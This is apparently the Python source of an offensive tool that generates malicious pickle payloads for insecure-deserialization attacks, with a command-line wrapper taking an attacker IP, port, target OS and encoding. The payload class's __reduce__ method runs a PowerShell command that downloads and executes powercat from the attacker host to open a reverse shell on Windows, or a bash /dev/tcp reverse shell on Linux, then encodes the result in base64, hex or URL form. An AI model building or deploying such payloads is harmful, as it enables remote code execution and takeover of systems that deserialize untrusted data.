import pickle
import os
from .encoded import Encode
from termcolor import colored

class Desserialize(object):

    def __init__(self,ip:str,porta:str,sistema:str):
        self.__ip = ip
        self.__porta = porta
        self.__sistema = sistema

    def __reduce__(self) -> tuple:
        match self.__sistema:
            case "Windows":
                text = colored('Link powercat: https://github.com/besimorhino/powercat/blob/master/powercat.ps1', 'red')
                print(text)
                return (os.system,(f"powershell -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://{self.__ip}/powercat.ps1');powercat -c {self.__ip} -p {self.__porta} -e cmd\"",))
            case "Linux":
                return (os.system,(f"/bin/bash -i >& /dev/tcp/{self.__ip}/{self.__porta} 0>&1",))    
                
class ObjetoMalicioso():

    def __init__(self,ip:str,porta:str,encode:str,sistema:str):
        self.__ip = ip
        self.__porta = porta
        self.__encode = encode
        self.__sistema = sistema

    def Objeto_Serializado(self):
        Object = pickle.dumps(Desserialize(self.__ip,self.__porta,self.__sistema))
        match self.__encode:
            case "b64":
                Encode.base64(Object)
            case "shell":
                Encode.shell(Object)
            case "urlencode":
                Encode.urlencode(Object)
            case "hex":
                Encode.hexadecimal(Object)



import argparse
from .run import ObjetoMalicioso
from argparse import RawTextHelpFormatter

def banner():
    return """                                                                                                                                                                                                                    
           _                 _     _ _         
 ___ _ _ _| |___ ___ ___ ___|_|___| |_|___ ___ 
| . | | | . | -_|_ -| -_|  _| | .'| | |- _| -_|
|  _|_  |___|___|___|___|_| |_|__,|_|_|___|___|
|_| |___|                                                                                                                                                                            
     v0.0.9 - @joaoviictorti                                                   
"""

def argumentos() -> None:
    
    parse = argparse.ArgumentParser(prog=banner(),usage="pydeserialize -ip 192.168.4.113 -p 80 -o Windows -e shell",formatter_class=RawTextHelpFormatter)
    parse.add_argument("--version",action="version",version="pydeserialize 0.0.7")
    parse.add_argument("-ip",action="store",type=str,dest="ip",required=True, help="Insert ip")
    parse.add_argument("-p",action="store",type=str,dest="port",required=True, help="Insert port")
    parse.add_argument("-e",action="store",type=str,dest="encode",choices=["b64","shell","urlencode","hex"],default="",required=True,help="Insert encoding")
    parse.add_argument("-o",action="store",type=str,dest="SO",choices=["Windows","Linux"],required=True,help="Insert operational system")
    args = parse.parse_args()
    
    ObjetoMalicioso(args.ip,args.port,args.encode,args.SO).Objeto_Serializado()